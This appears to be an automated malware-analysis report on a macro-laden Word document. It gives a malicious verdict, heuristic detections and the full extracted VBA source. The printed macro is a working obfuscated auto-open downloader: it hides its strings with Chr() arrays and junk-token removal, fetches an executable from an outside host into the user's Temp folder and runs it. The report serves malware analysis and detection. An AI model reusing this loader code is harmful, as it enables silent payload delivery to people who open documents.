MALICIOUS
130
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample contains an obfuscated VBA macro with a Document_Open auto-execution function. This macro constructs a URL ('http://the.eart.li/~sgathame/putty/0.70/putty.exe') and a temporary file path ('C:\Users\<username>\AppData\Local\Temp\wtphjgf.exe') to download and execute a second-stage payload. The use of ScriptControl and XMLHTTP suggests an attempt to download and run an executable.
Heuristics 5
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3127 bytes |
SHA-256: a60944b4c9a1d308a5a3d0f96e2956e3569062eddd3a96957d4c8425422f214f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Bruvera As String
Public Noimnot As String
Public Rohliky As ScriptControl
Private Function nubemrd(ByVal leika As String)
nubemrd = Replace(leika, "[D]", vbNullString)
End Function
Private Sub Document_Open()
Bruvera = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(115) & Chr(58) & Chr(47) & Chr(47) & Chr(116) & Chr(104) & Chr(101) & Chr(46) & Chr(101) & Chr(97) & Chr(114) & Chr(116) & Chr(104) & Chr(46) & Chr(108) & Chr(105) & Chr(47) & Chr(126) & Chr(115) & Chr(103) & Chr(116) & Chr(97) & Chr(116) & Chr(104) & Chr(97) & Chr(109) & Chr(47) & Chr(112) & Chr(117) & Chr(116) & Chr(116) & Chr(121) & Chr(47) & Chr(48) & Chr(46) & Chr(55) & Chr(48) & Chr(47) & Chr(119) & Chr(51) & Chr(50) & Chr(47) & Chr(112) & Chr(117) & Chr(116) & Chr(116) & Chr(121) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
Noimnot = nubemrd("C[D]:\U[D]ser[D]s\") & Environ(nubemrd("Us[D]er[D]na[D]me")) & nubemrd("\A[D]pp[D]Da[D]ta\Lo[D]ca[D]l\T[D]em[D]p\wtphjgf.e[D]xe")
Set Rohliky = New ScriptControl
Rohliky.Language = nubemrd("V[D]BSc[D]ri[D]pt")
Rohliky.AddCode mukewr()
Rohliky.Run nubemrd("Ca[D]ct[D]us")
End Sub
Private Function mukewr()
deletrs = vbCrLf
truetoth = nubemrd("[D]Su[D]b Ca[D]ct[D]us") & deletrs
truetoth = truetoth & nubemrd("[D]di[D]m [D]lh[D]rp") & deletrs
truetoth = truetoth & nubemrd("[D]di[D]m [D]rh[D]lp[D]o:[D] S[D]et[D] r[D]hl[D]po[D] =[D] c[D]re[D]at[D]eo[D]bj[D]ec[D]t(") & Chr(34) & nubemrd("[D]Mi[D]cr[D]os[D]of[D]t.[D]XM[D]LH[D]TT[D]P") & Chr(34) & ")" & deletrs
truetoth = truetoth & nubemrd("[D]di[D]m [D]yx[D]oz[D]e:[D] S[D]et[D] y[D]xo[D]ze[D] =[D] c[D]re[D]at[D]eo[D]bj[D]ec[D]t(") & Chr(34) & nubemrd("[D]Ad[D]od[D]b.[D]St[D]re[D]am") & Chr(34) & ")" & deletrs
truetoth = truetoth & nubemrd("[D]rh[D]lp[D]o.[D]Op[D]en[D] ") & Chr(34) & nubemrd("[D]GE[D]T") & Chr(34) & ", " & Chr(34) & Bruvera & Chr(34) & nubemrd("[D], [D]Fa[D]ls[D]e") & deletrs
truetoth = truetoth & nubemrd("[D]rh[D]lp[D]o.[D]Se[D]nd") & deletrs
truetoth = truetoth & nubemrd("[D]Wi[D]th[D] y[D]xo[D]ze") & deletrs
truetoth = truetoth & nubemrd("[D].t[D]yp[D]e [D]= [D]1") & deletrs
truetoth = truetoth & nubemrd("[D].o[D]pe[D]n") & deletrs
truetoth = truetoth & nubemrd("[D].w[D]ri[D]te[D] r[D]hl[D]po[D].r[D]es[D]po[D]ns[D]eB[D]od[D]y") & deletrs
truetoth = truetoth & nubemrd("[D].s[D]av[D]et[D]of[D]il[D]e ") & Chr(34) & Noimnot & Chr(34) & ", 2" & deletrs
truetoth = truetoth & nubemrd("[D]en[D]d [D]Wi[D]th") & deletrs
truetoth = truetoth & nubemrd("[D]Cr[D]ea[D]te[D]Ob[D]je[D]ct[D](") & Chr(34) & nubemrd("[D]WS[D]cr[D]ip[D]t.[D]Sh[D]el[D]l") & Chr(34) & nubemrd("[D]).[D]Ru[D]n ") & Chr(34) & Noimnot & Chr(34) & deletrs
truetoth = truetoth & nubemrd("[D]en[D]d [D]su[D]b")
mukewr = truetoth
End Function
Attribute VB_Name = "NewMacros"
Sub blccc()
'
' blccc Macro
'
'
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 13824 bytes |
SHA-256: cd7dd464416769ceee89a2ac8251750115aca4abd7f201da2378ea7870ee8162 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.